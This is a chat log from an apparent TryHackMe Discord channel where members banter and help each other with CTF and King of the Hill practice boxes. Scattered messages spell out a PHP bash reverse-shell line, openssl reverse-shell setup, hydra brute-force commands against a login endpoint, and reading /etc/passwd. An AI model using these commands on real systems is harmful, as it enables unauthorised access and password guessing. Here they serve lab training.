#voice-chat

1 messages · Page 9 of 1

tame ether
#

go back to kenobi

plucky vault
#

mount doesn't like me 😦

tame ether
#

;-;

plucky vault
#

like

#

i did the command

#

mount <ip>:/var /location

#

it just doesn't work.

forest python
#

sudo apt install nfs-common

plucky vault
#

o

#

i didn't know that

forest python
#

You need NFS stuff

plucky vault
#

i still can't update or install anything with sudo tho

#

0% [Connecting to rs.archive.ubuntu.com (147.91.175.253)]

forest python
#

Apt update?

plucky vault
#

still getting stuck

#

should i try to upgrade?

forest python
#

RIP

#

I mean idk if you can

plucky vault
#

--fix-missing?

tame ether
#

faulty source

plucky vault
#

no i removed the kali source as soon as i installed the gobuster

#

like instantly

#

hang on im gonna go make cigarete\

tame ether
#

cigarette

full sapphire
#

Also, those things'll kill ya

tame ether
#

^^

#

especially if you go smoke this frequently

#

and that early in your life

gaunt thunder
#

aren't you a little bit young to smoke mate?

plucky vault
#

(i started when i was 12 😂 )

gaunt thunder
#

that's not something you should be proud of

plucky vault
#

im not proud of it

gaunt thunder
#

fair nuff

plucky vault
#

wish i could stop

#

but yk it takes will to do it

gaunt thunder
#

there are many ways to stop it

#

you just need to set it in your mind

tame ether
#

focus the will to finish boxes into stopping smoking

plucky vault
#

but then i won't want to finish boxes

#

ooo you gave me an idea

#

what if i multitask

gaunt thunder
#

nope.

plucky vault
#

i mean its worth trying

#

🤷‍♂️

plucky vault
rose finch
#

LUL

gaunt thunder
#

@marble cape rn

muted sand
plucky vault
#

wow my internet just broke

gaunt thunder
#

meth?

#

oh wow

#

math

plucky vault
#

@forest python do you want to watch me do a writeup on wonderland ?

gaunt thunder
#

i gotcha

#

@plucky vault hit it

plucky vault
#

okay lets make it 😂

gaunt thunder
#

i'll make it tomorrow xd

#

i'll record the walkthrough and will do the writeup later

#

im tired tho

tame ether
#

i need to finish my writeup and start the python playground one kekw

gaunt thunder
#

man i need to learn making boxes

muted sand
#

I just got RCE on python playgorund 😄

gaunt thunder
#

im thinking of making a stego challenge

#

which needs less box development

#

then i'll go with box dev i guess

#

which needs less box development
@gaunt thunder i guess i accidentally triggered Muir

full sapphire
#

Fair warning -- we aren't really accepting things like steg / encoding / crypto in their own right

gaunt thunder
#

what

full sapphire
#

Not as public releases

#

Purely because we already have lots of them

gaunt thunder
#

hmm

#

i see

full sapphire
#

As in, we usually reject challenges like that

gaunt thunder
#

then i guess i need to combine it with a box

#

like one of urs

plucky vault
#

@full sapphire if i publish my room to public how long would i have to wait till it becomes public public

tame ether
#

keep them as a filler between normal releases kekw

full sapphire
#

You should see the release queue @tame ether 😆

#

No filler required

gaunt thunder
#

@tame ether i really have so basic idea about box dev

full sapphire
#

We're blocked in for the next month

tame ether
#

i'd love to (not that i'd want to do any of the boxes, blood is better)

muted sand
#

Muri whens my box out? kekw (i kid)

gaunt thunder
#

i saw john hammond's pickle box dev its just that

full sapphire
#

@plucky vault If it gets approved, at least a month just now

tame ether
#

not really @gaunt thunder

full sapphire
#

Muri whens my box out? kekw (i kid)
@muted sand Which one is it?

tame ether
#

it's encoding + exploiting

gaunt thunder
#

wut

muted sand
#

@muted sand Which one is it?
@full sapphire Jeff

full sapphire
#

Jeff

gaunt thunder
#

i didnt understand

muted sand
#

ye

gaunt thunder
#

yo whats goin on XD

tame ether
full sapphire
#

28th @muted sand

gaunt thunder
#

you mean box dev is not that hard? @tame ether

muted sand
#

Oo ty 😛

tame ether
#

oh wait

#

uhm

#

it's not easy for sure kek

plucky vault
#

@forest python help me i broke something

#

nwm i fixed it

#

should i add points to my walkthrough?

#

i go on phone

#

in bed

full sapphire
#

You don't add the points

#

Admins do

gaunt thunder
#

yo guys didnt want to cut your talking so im writing from here

#

its 4.07 a.m. and im out for today

#

take care

#

@forest python @marble cape @plucky vault

marble cape
plucky vault
#

nmap -sV -v -T4 <ip>

#

Gobuster dir -u <url> -w wordlist (optional stuff -x <.extension> -t sets the threads #100 reconmended)

pure rivet
prime summit
#

tac /etc/passwd | tac

#

@plucky vault

plucky vault
#

tac /etc/passwd | tac
@prime summit nope. but i got it now. solved the challenge haha

prime summit
#

cool

plucky vault
#

hey

zenith cradle
#

wsl --set-default-version 2

tame ether
#

D:

#

ping just went to the moon

livid crag
#

[================== 31.4% ]

zenith cradle
#

done ?

zenith cradle
#

USOClient.exe ScanInstallWait

#

USOClient StartInstall

livid crag
zenith cradle
livid crag
livid crag
zenith cradle
plucky vault
fresh solar
#

In binary 👏

plucky vault
#

Yes hahaha

#

😎

weary grove
#

there are 10 types of people in this world

#

those who understand binary and those who don't

valid night
#

And those who didn't expect a ternary joke

plucky vault
#

who is tenary?

#

or what

#

jajaja

weary grove
#

fixing the problem lol

#

evasion 100

plucky vault
#

oh sorry

#

my english is bad

valid night
#

git gud scrub

weary grove
#

who is ghost pinging me

fresh solar
#

🤷

weary grove
#

just like that yes lol

lofty moat
#

yeah? @plucky vault

#

you are supposed to solve the CTF? as you solve any other challenge

plucky vault
#

did you hear me ? \

languid zephyr
#

can we ask for help on a KOTH? Or hints?

real orbit
#

sure

languid zephyr
#

the one hackers

#

very hard to find a way to get in

#

I know it has to do with probably using hydra for example against either ftp or ssh

#

would that be correct?

real orbit
#

Hackers was designed to be difficult.

languid zephyr
#

I see that hahaha

real orbit
#

That's all I'll speak to :p

languid zephyr
#

no probs. I'll see what else I can find 😉

mellow frigate
#

hi

#

i have no mic

#

oh, it's ff1 character

#

sure no

#

it's girl from "SKAM"*

#

hi again

#

i have problems with thm network all the day

#

like ssh freezes, I have no ping, etc

full sapphire
#

!multivpn

trim cloudBOT
#
TryHackMe
• Step 1

Type ps aux | grep openvpn into your terminal and press enter

• Step 2

If there's more than one line (and the second doesn't have "grep" in it), do the following steps

• Step 3

Type killall openvpn into your terminal and press enter

• Step 4

Start the VPN with sudo openvpn <path-to-config>

full sapphire
#

Give that a try

mellow frigate
#

Thanks, but I have bad connection on 2 different networks on 2 different pc

full sapphire
#

Is the VPN open on both of them at once?

mellow frigate
#

No

slim knoll
#

strrev

mellow frigate
#

Like in the morning it was laggy and now it's laggy too

slim knoll
#

echo $reversed_s = join(' ',array_reverse(explode(' ',"Hello World")));

mellow frigate
#

1:19 AM

#

sure

#

hi

#

it's okay

#

no more or less - ok

#

and in Romania?

gusty lichen
#

I am eating food

#

I will be gone for a bit

mellow frigate
#

okay, wanna sleep

#

cya

gusty lichen
#

good bye

slim knoll
#

cya

slim knoll
#

wfuzz

plucky vault
#

Should I stick to Ubuntu or switch to Kali>

azure moss
valid night
#

@tame ether how are you gonna make the cli tool?

buoyant lichen
#

with hands

#

and some programming language

fossil estuary
lofty estuary
crisp moat
#

In BP Networking the answer shows wrong in task3 question number 2 convert decimal 34 to binary I put the answer correct but it says wrong answer please help me

lofty moat
candid maple
#

@lofty estuary

fast ruin
#

change your speaker settings

candid maple
#

but we listen you

#

@lofty estuary maybe restart your discord

lofty estuary
#

good idea

lofty moat
#

you guys playing koth? can i join in?

candid maple
#

no but we can start one

lofty estuary
#

naugty joiin

candid maple
lofty moat
#

There is mostly a flag in every user folder. user.txt and one in root.txt and you gotta find others

#

😄

#

you need to find the credentials for the ssh

#

every KOTH machine have ssh enabled

candid maple
#

cve-2019-16278

lofty moat
#

cve-2019-16278
@candid maple which room?

candid maple
#

Lion

lofty moat
#

i dont use metasploit or those exploits for koth actually

#

for lion i havent done much except getting a reverse shell

#

from uploads

#

there are like 3,4 ways to get into every KOTH machine. and not everyone knows all the ways in so there is always a possibility for you to find a way to get in

#

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

#

umm i have done every machine in KOTH except carnage and offline

#

i can root every koth machine in like within a minute except hackers it takes like 3 minutes max

#

i am back

#

something came up

#

i can do a walkthrough for you if you want? @candid maple

#

yeah

#

yeah id_rsa

#

i havent patched anything

#

To use id_rsa you need to chmod 600 id_rsa

#

@candid maple ^

#

yeah

#

sudo chmod 600 id_rsa

candid maple
lofty moat
#

ssh -i id_rsa

candid maple
lofty moat
#

sudo -l

#

do you know what it does? ^

#

google it. what sudo -l does

#

about your vpn keep crashing

#

i hate carnage

#

havent done it yet 😄

#

imma try some day

#

cant show the full method do it 😄

plucky vault
#

😦

#

i really wanted to see

#

Do the king of the hill already

lofty moat
#

bruteforcing it

plucky vault
#

oh

#

nice

#

lmaoooo

#

@lofty moat can he/she bypass that ?

#

yes please

#

we do

brave tartan
#

@lofty moat im late to the party.

neon adder
#

What are you doing

lofty moat
#

just playing koth

#

hackers

neon adder
#

Ok

plucky vault
#

@lofty moat what are somethings that are against thm's tos

#

that some players do

#

?

#

what about the 9 flags

#

@lofty moat sorry for the pings ^^

#

what about the 9 flags @lofty moat

#

"9 flages to obtain" @lofty moat

brave tartan
#

@lofty moat Will you be streaming everyday? This is so helpful.Thank you

plucky vault
#

Please do so

#

kek

lofty moat
#

🙂

brave tartan
#

@lofty moat can we open ports or something? is it allowed?

lofty moat
supple trellis
#

@lofty moat how about changing the active file descriptor for king.txt? 😄

thick cipher
#

I like that flag finder

#

My favorite way to mess wig other players: set a bunch of movie quotes as a bash array, for loop through /pts/x that’s not me, echo a quotes from the array to their /dev/pts, sleep 2 seconds.

supple trellis
#

@lofty moat editing /proc/fd of koth binary

lofty moat
#

aah never done that

hasty dawn
#

the magic word being sudo?

lofty moat
#

he sets aliases for multiple commands

thick cipher
#

Ah ah ah is another favorite of mine

#

But I try and stay away from using that one if there are folks new to that box. Gotta make sure they have a chance to learn and have fun

hasty dawn
#

WOOO Naughty is 1st!

#

kek

plucky vault
#

@lofty moat thanks for the tips really helpful, i wish you can stream on the daily.

lofty moat
#

😄

plucky vault
#

cya

lofty moat
#

cya

thick cipher
#

Panda is another fun one. Took me forever to get an initial foothold the first time. But after that it was quick

hasty dawn
#

damn he's on fire

brave tartan
#

yep. Closing every way in.

thick cipher
#

I’ve found additional instances of chatter in weird places. This is my chattr-finder:

#

clear; find / -name "chatt" -type f -exec ls -ld {} ; 2>/dev/null

brave tartan
#

how do you write into the file if someone used chattr?

thick cipher
#

chattr -i file

brave tartan
#

thank you @thick cipher

lofty moat
#

what do you mean by looking for chattr?

#

wont which chattr will locate that?

#

also you can change the name for the chattr binary as well

thick cipher
#

Put a backslash before the final semi-colon to escape out. Discord removed it for some reaso

#

The baskslash escapes the semi-colon. No space between

hasty dawn
#

can't you upload your own binaries to make sure they're fine? xD

lofty moat
#

same thing for which chattr?

thick cipher
#

I’ve had issues with which chattr. I think which only looks in your path where that one-liner looks everywhere

plucky vault
#

You can also compile your own chattr

hasty dawn
#

lel

lofty moat
#

well that one liner will only look for chattr, if someone is changing the path they can also change the name for it as well

thick cipher
#

Example: Food has multiple copies hidden around

hasty dawn
#

damn I wish it was the same in my room

thick cipher
#

Lol

#

You can put one-liners together to find / kill reverse shells....

lofty moat
#

i use killall or kill -9

brave tartan
#

wouldnt killall kill your own shell?

fresh solar
#

No.

brave tartan
#

oh.Didnt know that

fresh solar
#

If you had removed the php from the beginning then it would have worked @lofty moat

#

@lofty moat Change the ip

#

🤔

#

@lofty moat Try this one(you'll also need to change ip): exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

brave tartan
#

any idea why the first connection kept closing?

lofty moat
#

any idea why the first connection kept closing?
@brave tartan that was a wrong reverse shell i think

thick cipher
lofty moat
#

too tired

#

imma sleep

thick cipher
#

I blame @lofty moat for making me want to stream one lol

lofty moat
#

its 1 am

thick cipher
#

ouch! get some zzz

lofty moat
#

imma go against you tomorrow 😄

thick cipher
#

lol

lofty moat
#

stream is loading for anyone?

winged agate
#

yep

#

@lofty moat come join the koth?

floral trout
#

I can't see anything on the stream rn :/

lofty moat
#

@lofty moat come join the koth?
@winged agate aah gonna sleep

plucky vault
#

@lofty moat please

lofty moat
#

toooo much tired

winged agate
#

aah okay :)

plucky vault
#

oh

#

have a gn

lofty moat
#

i would love to turned off VM as well

winged agate
#

i have to install a vm :P

#

im currently sshing into the kali

plucky vault
#

who gonna live stream

floral trout
#

@thick cipher you are not going to stream ? 😢

lofty moat
#

welp gn 🙂

thick cipher
#

I am, it's just being a pain

floral trout
#

if it's too complcated you can give up, but i would be glad

#

i'm learning 🙂

thick cipher
#

lol

plucky vault
#

@lofty moat

#

hes back

floral trout
#

what is your shell manager ?

#

it's not tmux isn't it ?

thick cipher
#

yeah, it's tmux

floral trout
#

ok i need to activate the mouse selection

thick cipher
#

it's great once you get it the way you like it

floral trout
#

there is a robots.txt

#

and oh yeah a backdoor

#

x)

thick cipher
#

lol

floral trout
#

you're a monster

thick cipher
#

how so? i haven't done anything but get king.....i didn't even do anything to keep it lol

floral trout
#

how do you connect to the backdoor ?

winged agate
#

my pc crashed :(

floral trout
#

oki 🙂

thick cipher
#

use hydra and rockyou

winged agate
#

thats what i was trying

thick cipher
#

my pc crashed :(
@winged agate oh that sucks! can you get it back up quickly?

winged agate
#

ill try :)

thick cipher
#

sweet! i'm not going ham, so king is absolutely up for grabs

lofty moat
#

In top terminal is that a watch command?

winged agate
#

okay :)

thick cipher
#

not really. it's a while true loop.

lofty moat
#

Noiceee

thick cipher
#

while true; do clear; date; echo -e "\nCurrent king: $(cat /root/king.txt)\n"; w | grep -iv $MyIP; sleep 2; done

#

It lets me see who's on the box without being a jerk about it

candid maple
#

@thick cipher can you share you theme ?

#

your*

floral trout
#

wtf

thick cipher
#

What do you mean by theme?

floral trout
candid maple
#

you using a theme in kali right ?

thick cipher
#

no, just regular old kali. my terminal is tmux that i put a script to together to launch and whatnot

candid maple
#

ohh ok

#

thanks

floral trout
#

mmh oki i'm going to check that

lofty moat
#

@floral trout you gotta scan again also you can use -t 64 for faster results

thick cipher
#

Your hydra has the wrong input for a failed login. try manually once with it going through burp

#

that'll give you the accurate "incorrect" notation so you can tell hydra

#

@floral trout did yfou get it working?

winged agate
#

i get the sane thing

#

with hydra

thick cipher
#

have you tried to login through the browser with burp in the middle?

winged agate
#

yep

thick cipher
#

the site it's sending creds to, and your "login failed" need fixing

winged agate
#

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.122.134 http-post-form "/backdoor:username=^USER^&password=^PASS^:Incorrect Credentials" -V

#

this is my command

plucky vault
#

plague

floral trout
#

i have the same thing

thick cipher
#

For those that requested reset, i haven't done anything to close any services or change passwords

floral trout
#

exact same command

thick cipher
#

hydra -l plague -P /usr/share/wordlists/rockyou.txt -t 64 -I $TGT_IP http-form-post "/api/login:username=^USER^&password=^PASS^:F=Incorrect" -V

floral trout
#

/api/login ?

thick cipher
#

That's why you kick an attempt on burp.

floral trout
#

this line was important so

#

POST /api/login HTTP/1.1

#

yeah i was searching for the line "referer" in burp

#

but i didn't found it

thick cipher
#

referrer not needed

floral trout
#

oki

winged agate
#

oh

#

didnt see that

floral trout
#

and why is t-64 quickier ?

#

it seems to work for me

thick cipher
#

it runs 64 threads at the same time instead of just one

floral trout
#

oh

#

you did this hydra attack in less than 2min ?

thick cipher
#

yeah. it'll find the password to login to the backdoor for you

floral trout
#

🙀

#

yeah i'm just so slooooow dude

thick cipher
#

and it changes everytime. so you have to re-run the hydra command every reset / game

#

hi @plucky vault

floral trout
#

i'm in !

#

So happy !

thick cipher
#

NICE!! Congrats!!!

floral trout
#

ty :3

#

don't kick me for the moment please 😄

thick cipher
#

Now work on a regular shell... the backdoor is cool and all, but shells are better

#

lol, i'm not kicking anyone this round....but i might mess around a tiny bit, but no super dick moves

#

hydra to get the password on the backdoor

lofty moat
#

Stream working?

thick cipher
#

as best i know, it is

thick cipher
#

that's weird. lemme restart the broadcast

lofty moat
#

Working now

#

We need a commentator in here. Everyone is so dilent xD

thick cipher
#

lol. i don't have a mic hooked up to my kali vm or i would talk at least a little bit lol

lofty moat
#

Box reset ?

thick cipher
#

@plucky vault On my screen is your hint once you're on the backdoor

lofty moat
#

Umm i think no? Did you privesc from using that gtfo sudo privesc method?

#

He is not talking

thick cipher
#

Not really. I did a sudo file write of my public key in to /root/.ssh/authorized_keys then just did a regular ssh

lofty moat
#

Same

#

Sudo privesc given in gtfo won't work

winged agate
#

if i run those commands it isnt working

thick cipher
#

Which commands?

lofty moat
#

^

winged agate
#

from gtfobins

#

sudo

lofty moat
#

It wont work

floral trout
#

i took soooooo long to get a reverse shell wtf

#

but i'm in

lofty moat
#

Try the other methods. How can you use openssl

winged agate
#

could you demonstrate? :D

thick cipher
#

You need to run some commands on your attacker box (kali, parrot, blackarch) and some on the target / victim box for that one

lofty moat
#

Well i did when i was streaming 😂

winged agate
#

i wasant here

thick cipher
#

but if you use the file write to put your ssh public key as authorized for root........................................................

lofty moat
#

Well just read that gtfo page what else you can do?

#

And there goes n0beard spoiling the method 🤣😂

thick cipher
#

@lofty moat someone once told me that gcrawford's ssh key is "leaked". . . have you ever seen it anywhere but when you're already on the box?

#

lol

floral trout
#

first flag !

#

I'm a child 😂

lofty moat
#

Yeah have seen it

floral trout
#

how did i managed to get second 😮

#

i'm a noob

lofty moat
#

Well that's also always randomly generated though

#

I only know like 3 ways to get in

thick cipher
#

now push for a true shell and you should be able to FIND a bunch of flags

lofty moat
#

For hackers

floral trout
#

a stabilized shell ?

thick cipher
#

you can either try to stabilize it, or find a way to login through ssh

lofty moat
#

Google how to upgrade your shrll to a fully working one

thick cipher
#

@lusty light may or may not have talked about exactly that in a presenation . .. . .. . . . that's online . . . . . .

lusty light
#

❤️

thick cipher
#

Welcome @lusty light ! Kick ass job this weekend on that CTF!

lusty light
#

@thick cipher Ah thank you so much! Hope it was a blast!

thick cipher
#

I didn't get a chance to play, but i got to see your videos on it

floral trout
#

Hey @lusty light i'm in love of this community thank's to your youtube channel, so take all my love w3

#

❤️

lusty light
#

@floral trout Ah thank you, that is great to hear!

floral trout
#

@thick cipher i saw a sudo permission though openssl with sudo but can i get a shell with that

thick cipher
#

if you think outside the box a bit. figure out a way to get authorized for ssh.....perhaps as root even

floral trout
#

@lusty light I know that you don't understand why people are watching you doing koth because you just swap between 57 shells but eh it's funny and you can learn a lot 😄

winged agate
#

at the end, can you do a walkthrough on how you did it?

thick cipher
#

I've learned a TON watching John's wild shells

#

@winged agate not while the box is still live. when they put it in the warehouse i might

slim knoll
#

i hate the bruteforce part

thick cipher
#

agreed

winged agate
#

ah okay

thick cipher
#

a lot of google and even more trial/error

#

have you done the THM rooms? kept notes somewhere on what you've learned?

floral trout
#

the psw is changing though a reset ?

thick cipher
#

yes, it changes every single time

floral trout
#

erf

thick cipher
#

Try Hack Me

#

Damn......i made @lusty light king, but the game doesn't recognize it because he's not in the match 😦

floral trout
#

oh i understand better the key.perm file which has appear from nowhere now xD

thick cipher
#

like i do some nmap stuff and every single time i'm in the same place as i was before
@plucky vault nmap and gobuster are great places to start on ANY koth

lofty moat
#

Uhmm i don't wanna be rude but please no unnecessary mentions please?

thick cipher
#

Good call

#

That's okay. We all start from zero at some point in our lives. Start completing the THM rooms. Blue Team and Red Team Primers are a great place to start. just keep notes

slim knoll
#

this box is so easy to sabotaje

floral trout
#

what is this bad token error message ?

thick cipher
#

do you use metasploit
@plucky vault Sometimes, but a lot of the KotH games you don't need it

#

I think it's just because I let the session time out

#

nmap is just the first step

slim knoll
#

what is this bad token error message ?
@floral trout is when somone took the next session by login in ...

thick cipher
#

ah!

slim knoll
#

you can flood with valid credentials and block everyone out

#

see?

thick cipher
#

lol

slim knoll
#

should i stop?

winged agate
#

woah

thick cipher
#

should i stop?
@slim knoll probably. some folks are trying to learn

#

Private games, however, lol

slim knoll
#

woah
@winged agate hello fellow, greetings from Bucharest

floral trout
#

quite late now ^^

slim knoll
#

I stopted

#

i was unaware

#

my bad

thick cipher
#

neither was i. i thought we could all have a backdoor session at the same time

slim knoll
#

but, there is a probleme anyway

floral trout
#

@thick cipher we needed this ?
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

slim knoll
#

neither was i. i thought we could all have a backdoor session at the same time
@thick cipher exactly this is the problem

winged agate
#

I'm also from bucharest, @slim knoll :D

thick cipher
#

That's one way. It'll get you a reverse shell. But there are other ways to get a regular shell if you use your imagination

floral trout
#

oki 🙂

winged agate
#

it was a nice game guys

floral trout
#

Thank's it was funny

winged agate
#

gg :)

thick cipher
#

Good game!

floral trout
#

not very close but still funny ^^

winged agate
#

we are all learning

slim knoll
#

I'm also from bucharest, @slim knoll :D
@winged agate i know Andrei :))

thick cipher
#

Having fun and learning, that's what it's all about

slim knoll
#

should we pick another box?

winged agate
#

sure

thick cipher
#

Unfortunately I have to adult for a while, but that was fun!

lofty moat
#

Do Carnage

slim knoll
#

why not carnage?

#

btw, i do not have premium

#

picking one randomly?

lofty moat
#

I can make one for you guys if no one got premium?

floral trout
#

It's free to play no ?

#

everyone can create a public game and share the url

slim knoll
lofty moat
#

But in private game you can select which game you wanna play

#

If you're subscribed

slim knoll
#

should we pick one box?

floral trout
#

some of you wants to talk while hacking ?

#

i'm not very good in english but it's a good practise

candid maple
#

Can i join Koth ?

#

@slim knoll

thick cipher
thick cipher
thick cipher
slim knoll
quiet needle
#

Your message might get noticed a bit quicker in #koth (:

lofty moat
#

Szy late night classes, yaaayyy

tame ether
#

no teaching from me today kekw

cursive herald
#

since we're all deaf in here let me teach u some british sign language

lofty moat
#

But why not? 😰

fathom coyote
#

No we're not deaf, we're mute

lofty moat
#

Same thing

tame ether
#

no lesson because i'm watching netflix rn kekw

fathom coyote
#

So its not paradox

lofty moat
#

screen share

cursive herald
#

@tame ether what ya watching

tame ether
#

haha no free entertainment for you

#

@cursive herald mindhunter

#

s2e6 rn

cursive herald
#

is it good?

lofty moat
#

If only I had Netflix

tame ether
#

yeah, pretty good

lofty moat
#

I wouldn't ask szy to stream

fathom coyote
#

Haha imagine having Netflix. kekw

cursive herald
#

@lofty moat i can stream netflix i currently have 300 kbps up so you'll maybe get 64p quality

lofty moat
#

Only rich kids gets to have Netflix

#

Those kids from school who use to bully me have one

fathom coyote
#

You should try to impress them with Amazon Prime instead. Git Gud.

tame ether
#

"rich kids" kekw

cursive herald
#

is that elf

#

no

#

ok

#

oh rip szy

#

getting roasted

tame ether
#

smh bee

lofty moat
#

The only thing i have to impress someone is .... Actually nothing,whom am i kidding

fathom coyote
#

GBR ded 😦

lofty moat
#

Where is that sound coming from?

#

Oh voice chat. Nvrmnd

fathom coyote
#

Yeah I was wondering why my computer was talking

lofty moat
#

Szy almost 18.. noted in my Dark diary

#

Now tell me your security question answers.

#

Aah gn. Gotta wake up in 4,5 hours.

fathom coyote
#

Get some sleep. Sleep = good

tame ether
#

gn naughty

tame ether
#

Imma brb in few mins

rough flax
#

whats happenin here boys...

tame ether
#

:0

#

hope you don't talk about me when i'm gone

rough flax
lofty estuary
midnight fern
#

hope you don't talk about me when i'm gone
@tame ether That's all we've been doing.

tame ether
#

yeah yeah

#

hunting thieves is more important than listening to you deciding whether you want to ban me or not kekw

marble cape
#

he's not kidding

tame ether
#

¯_(ツ)_/¯

midnight fern
#

hunting thieves is more important than listening to you deciding whether you want to ban me or not kekw
@tame ether You hunt thieves?

lofty estuary
#

im a 56 years old female living in alaska

tame ether
#

we just found a ctf that straight up ripped our stuff only changing flags kekw

#

most of the challenges are just old released ones with changed flags

midnight fern
#

we just found a ctf that straight up ripped our stuff only changing flags kekw
@tame ether That is super annoying

lofty estuary
#

i have a 9 inch big

#

Sandwich

tame ether
#

yeah

#

even ripped the rule text from our discord channel without changing our fancy ctf name that was put in there lmao

full sapphire
#

Oof

midnight fern
#

That hurts

plucky vault
#

How about tomato juice?

midnight fern
#

Face reveal -- @full sapphire

full sapphire
#

No way 😆

midnight fern
#

loll

full sapphire
#

PG13 @marble cape 😁

marble cape
full sapphire
#

Also @midnight fern I can still hear you...

#

I do not believe this has devolved into @midnight fern offering relationship advice kekw

midnight fern
#

It absolutely has

#

It’s getting worse

#

Lol

#

@full sapphire you left us

#

I’m going to have to leave now.

fathom coyote
full sapphire
#

I have PWK to do, and my music is more soothing than you lot simping 😁

fathom coyote
#

So yeah that's not confusing.

midnight fern
#

I have PWK to do, and my music is more soothing than you lot simping 😁
@full sapphire I heard you simping in there too.

#

Focus on the PWK's bro!

#

Not all the Women of THM.

full sapphire
#

Smh. When have you ever seen me interested in anyone?...

midnight fern
#

In me loveparrot

full sapphire
#

You wish 😆

midnight fern
#

hhahahha ❤️

tame ether
midnight fern
#

Do these people really not exist?

plucky vault
midnight fern
#

I can't tell if it's a good photoshop job

full sapphire
#

Those people are computer generated

midnight fern
#

or just random photos

#

That's incredible

full sapphire
#

It's neither -- they're literally generated when you click the button

#

Hence the backgrounds sometimes being, uh...

#

Demonic

midnight fern
#

Is it open source?

#

I can Google that

full sapphire
#

I think so

fathom coyote
midnight fern
#

That is absolutely insane.

full sapphire
#

I know someone who can see through it

fathom coyote
#

That literally looks like a typical dude I'd know

full sapphire
#

But only one

midnight fern
#

They can tell if it's not a real human?

#

Because I can't

#

at all

full sapphire
#

Mhm. Something about the forehead distance.

midnight fern
#

I have a 5 head

#

does that mean I don't exist?

#

Feelings are severely hurt now 😦

fathom coyote
midnight fern
#

This gives it away, a bit

fathom coyote
#

I was looking at the microphone embedded in his chin

midnight fern
#

That is normal

#

I have that naturally.

fathom coyote
#

Explains a lot

midnight fern
#

🤣

bleak lodge
#

cisterian monk

rustic mica
#

@plucky vault You aussie too, mate?

plucky vault
#

Lol, yeah.

#

My accent?

#

Aodaliya!

#

Aodaliya ren.

rustic mica
#

I saw the time on you box and realised it wasn't mine.

plucky vault
#

@rustic mica, any ideas on what I should do next?

rustic mica
#

Man, you exhausted every avenue I would have thought to take.

plucky vault
#

hmmm.

rustic mica
#

@plucky vault have you tried find / -iname "pass*" 2> /dev/null ?

#

Or did you find the pass already?

#

I see the file in there.

#

Yeah man, that find command brings it up. Look harder at the results.

#

Hahaha, SO CLOSE

#

THERE HE GOES

#

hahaha

#

Nice one man

plucky vault
#

THANK YOU!!!!

#

Fuck

#

.....

tough badger
#

F

rustic mica
#

I gotchu fam.

plucky vault
#

There we go. I'm in.

#

....

rustic mica
#

ha c k er ma n

visual wyvern
rustic mica
#

@marble cape Outside? Someone turned the gama up too high out there.

alpine pasture
#

whatcha guys talkin about in general?

rustic mica
#

@marble cape That would be something I'd love to read, myself.

fossil estuary
gusty lichen
rustic mica
#

RIP aussie internet

#

plz b safe ameribr0s.

real orbit
fossil estuary
marble cape
real orbit
rustic mica
#

Texas is just America's Sydney.

fringe hare
#

You got it boy @plucky vault

fervent maple
#
fossil estuary
fervent maple
#

cat file | base64 # encode

visual wyvern
fervent maple
#

echo 'base64-string' | base64 -d > file.wav

visual wyvern
#

Flag 33 is misleading since you need to be logged in as bob. But its first mentioned at flag 34.

visual wyvern
#

clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR

fervent maple
#

This may cause "CL_OUT_OF_RESOURCES" or related errors

iron bay
#

@fringe hare what are you doing??

fringe hare
#

The last task of hackpark

#

NotLikeThis Finally, i got that shit

iron bay
#

great

plucky vault
#

Good morning everyone.

#

Happy weekend from Aodaliya!

coral valley
#

Good morning? @plucky vault what time is it in your country?

plucky vault
#

9:44AM.

plucky vault
#

all good.

#

Microphone broke i think

plucky vault
#

my microphone broke

#

again

#

I hvae no fucking idea.

#

im strumped

#

stumped

#

//

#

spontaneous

#

random

#

no changes to settings or anything

#

Nice, just enabled rdp from a meterpreter session.

#

Just finished a box

#

ice

#

I might not be able to hear you.

#

Because of noise

visual wyvern
#

what noise?

plucky vault
#

Vacumn

#

okay its gone now

#

Server muted?

#

oh

#

happy weekend

#

Yu gi oh and pokemon were my childhood.

#

Everyone will compain about the government; which is good, it keeps them accountable.

#

What's with 568.c on exploit-db? I can't even compile this crappy code.

#

Am I streaming?

#

Alright im going.

#

see ya guys.

tame ether
#

@midnight fern

visual wyvern
tame ether
#

wtf

visual wyvern
tame ether
#

@lapis furnace I will neither confirm or deny the realness of my pic

fossil estuary
lofty estuary
visual wyvern
lapis furnace
lofty estuary
lapis furnace
visual wyvern
fathom coyote
tame ether
full sapphire
#

Oi @midnight fern behave! 🤣

#

Totally did not fall for that months ago

lofty estuary
tame ether
#

👀

lapis furnace
fossil estuary
#

i feel old pepehands

full sapphire
#

Liar @midnight fern 🤣

fathom coyote
#

My name is Mary Lou Dudechacho and I'm 69 years old. I live in Mars.

full sapphire
#

You are totally going to be able to bribe him

#

He's broke

midnight fern
#

@plucky vault you going to deceive your boi pepeSadmusic

tame ether
#

@plucky vault i'll mail you taquitos if you give me 0day's info you got 😎

plucky vault
#

Smh

#

No @tame ether

tame ether
#

:0

#

D:

plucky vault
#

Can't bb

tame ether
#

i understand :(

plucky vault
#

Promised 0day I wouldn't give out that info

#

You know how it be

tame ether
#

i'll eat the taquitos myself

fathom coyote
#

Can we crowdfund this?

plucky vault
#

Crowdfund what

#

@full sapphire smh I won't be so easily bribed

fathom coyote
midnight fern
#

@full sapphire smh I won't be so easily bribed
@plucky vault ❤️ you

plucky vault
#

<3

rough flax
plucky vault
rough flax
fossil estuary
visual wyvern
lofty estuary
lofty moat
#

So what are you guys doing rn?

fathom coyote
#

sitting around a campfire and spitting in the fire

plucky vault
#

I'm in bed

#

I may sleep it's possible

lofty moat
#

I meant for the people live in voice chat but ok .

lofty estuary
#

watching sexual reproduction videos for my bio class

fathom coyote
#

We were talking about ethical hacking

#

Got onto discussing it from one of the dumb post earlier on what is on a child's pc

lofty moat
#

.....

#

was that speak speak speak for me?

fossil estuary
#

📗LIMITED TIME!!! GET MY NEW BOOK FOR $1!📕 https://bit.ly/2nAAN5d
🎵Teach me how to tunnel, teach me, teach me how to tunnel🎵 Ever gotten frustrated because your school or your work blocks fun/entertaining sites that can help you unwind and relax therefore increasing your produc...

▶ Play video

